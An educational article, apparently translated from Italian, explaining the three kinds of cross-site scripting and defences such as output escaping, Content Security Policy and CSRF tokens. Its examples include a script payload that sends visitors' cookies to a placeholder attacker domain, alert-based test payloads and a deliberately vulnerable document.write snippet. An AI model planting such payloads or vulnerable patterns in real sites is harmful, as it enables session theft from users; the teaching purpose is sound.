- XSS (Cross-site scripting) attacks are among the most widespread vulnerabilities in web applications. In this article, we will delve into what an XSS attack is, what types exist, how it works, and we will see practical code examples to better understand how it works. Finally, we will illustrate how to protect your website from these cyber threats.
Il Cross-site scripting (XSS) is a cyber attack in which an attacker inserts malicious code, usually JavaScript, into a trusted web page. When a user views this page, the malicious code is executed directly in the victim's browser, allowing the attacker to steal sensitive information, steal sessions, or perform unwanted operations.
XSS attacks are mainly divided into three categories:
The malicious code is stored on the server and executes automatically when the infected page is loaded.
Stored XSS example:
<!-- Un commento malevolo inserito in un forum --> <script> document.location='http://malicious-site.com?cookie='+document.cookie; </script>
This type is very dangerous because it can affect all users who view the compromised page.
The malicious code is included directly in the HTTP request (usually via a malicious link) and immediately reflected in the response.
Reflected XSS example:
Malicious URL:
http://esempio.com/ricerca?q=<script>alert('XSS')</script>
If the parameter q is not properly sanitized, the JavaScript code will be executed in the user's browser.
In this variant, the malicious code is executed directly on the client without being sent to the server. This happens when JavaScript improperly handles unsanitized data.
Example of DOM-based XSS:
<script>
var param = location.hash.substr(1);
document.write("Benvenuto " + param);
</script>
Malicious URL:
http://esempio.com/#<script>alert('XSS')</script>
XSS attacks mainly occur when a web application does not properly sanitize user-provided input. Malicious code exploits this vulnerability to insert itself into the web page and execute in the victim's browser. This way, the attacker can:
To prevent XSS attacks, it is necessary to adopt some key security strategies:
It is essential to always sanitize the data entered by users before displaying them on the web page:
PHP Example:
// Sanificazione input $commento_sicuro = htmlspecialchars($commento, ENT_QUOTES, 'UTF-8'); echo $commento_sicuro;
Implementing a Content Security Policy helps limit the origins allowed to execute scripts and prevents malicious code from running:
HTTP Header Example:
Content-Security-Policy: script-src 'self'; object-src 'none';
Make sure that user data output is properly encoded to avoid accidental execution:
JavaScript Example:
// Codifica sicura
const nomeUtente = "<script>alert('XSS');</script>";
document.getElementById('user').textContent = nomeUtente;
Implement anti-CSRF tokens to protect requests and prevent combined XSS/CSRF attacks:
CSRF token example in PHP:
session_start(); $_SESSION['token'] = bin2hex(random_bytes(32));
A web application firewall can detect and block XSS attacks before they reach your application.
Regularly updating your software and frameworks helps fix known vulnerabilities and protect against cyber attacks.
Educating users about the risks of clicking suspicious links or entering sensitive data on untrustworthy web pages can significantly reduce the risk.
XSS attacks are a real and widespread threat on the web. However, by adopting the illustrated best practices and adequate tools, it is possible to effectively protect your application and ensure the safety of your users.
